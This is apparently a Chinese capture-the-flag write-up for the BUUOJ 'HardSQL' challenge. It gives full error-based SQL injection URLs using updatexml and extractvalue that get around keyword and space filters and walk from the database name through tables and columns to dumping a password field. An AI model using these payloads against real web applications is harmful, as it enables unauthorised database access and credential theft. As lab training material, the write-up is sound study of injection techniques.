[极客大挑战 2019]HardSQL

目录

• [极客大挑战 2019]HardSQL
  • 首先简单测试一下题目
    • 0x00
    • 0x01
    • 0x02
    • 0x03
    • 0x04
    • 0x05

[极客大挑战 2019]HardSQL

首先简单测试一下题目

0x00

测试过滤了and、= 空格 union等多个sql关键字

0x01

查数据库信息

http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=admin%27or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21
http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21

![图片上传中...]
geek

0x02

查表

http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like%27geek%27),0x7e))^%271&password=1

![图片上传中...]
H4rDsq1

0x03

查字段

http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=1%27^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like%27H4rDsq1%27),0x7e))^%271&password=1

0x04

查询password

http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=1%27^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))^%271&password=1

![图片上传中...]
但是这个只有半边
剩下半边

http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=1%27^extractvalue(1,concat(0x7e,(select(group_concat(right(password,13)))from(H4rDsq1)),0x7e))^%271&password=1

![图片上传中...]

0x05

acc
End